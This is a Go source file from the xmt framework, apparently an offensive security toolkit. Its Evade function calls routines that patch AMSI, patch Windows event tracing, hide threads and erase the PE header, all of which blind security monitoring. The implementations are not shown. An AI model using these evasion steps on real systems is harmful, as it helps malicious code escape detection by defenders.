github.com/iDigitalFlame/xmt@v0.5.4/device/evade_windows.go (about)

     1  //go:build windows
     2  // +build windows
     3  
     4  // Copyright (C) 2020 - 2023 iDigitalFlame
     5  //
     6  // This program is free software: you can redistribute it and/or modify
     7  // it under the terms of the GNU General Public License as published by
     8  // the Free Software Foundation, either version 3 of the License, or
     9  // any later version.
    10  //
    11  // This program is distributed in the hope that it will be useful,
    12  // but WITHOUT ANY WARRANTY; without even the implied warranty of
    13  // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    14  // GNU General Public License for more details.
    15  //
    16  // You should have received a copy of the GNU General Public License
    17  // along with this program.  If not, see <https://www.gnu.org/licenses/>.
    18  //
    19  
    20  package device
    21  
    22  import "github.com/iDigitalFlame/xmt/device/winapi"
    23  
    24  // Evade will attempt to apply evasion techniques specified by the bitmask flag
    25  // value supplied.
    26  //
    27  // The flag values are in the form of 'Evade*' and are platform specific.
    28  //
    29  // Any errors that occur during execution will stop the other evasion tasks
    30  // scheduled in this function flags.
    31  func Evade(f uint8) error {
    32  	if f&EvadeWinPatchAmsi != 0 {
    33  		if err := winapi.PatchAmsi(); err != nil {
    34  			return err
    35  		}
    36  	}
    37  	if f&EvadeWinPatchTrace != 0 {
    38  		if err := winapi.PatchTracing(); err != nil {
    39  			return err
    40  		}
    41  	}
    42  	if f&EvadeWinHideThreads != 0 {
    43  		if err := winapi.HideGoThreads(); err != nil {
    44  			return err
    45  		}
    46  	}
    47  	if f&EvadeEraseHeader != 0 {
    48  		if err := winapi.ErasePEHeader(); err != nil {
    49  			return err
    50  		}
    51  	}
    52  	return nil
    53  }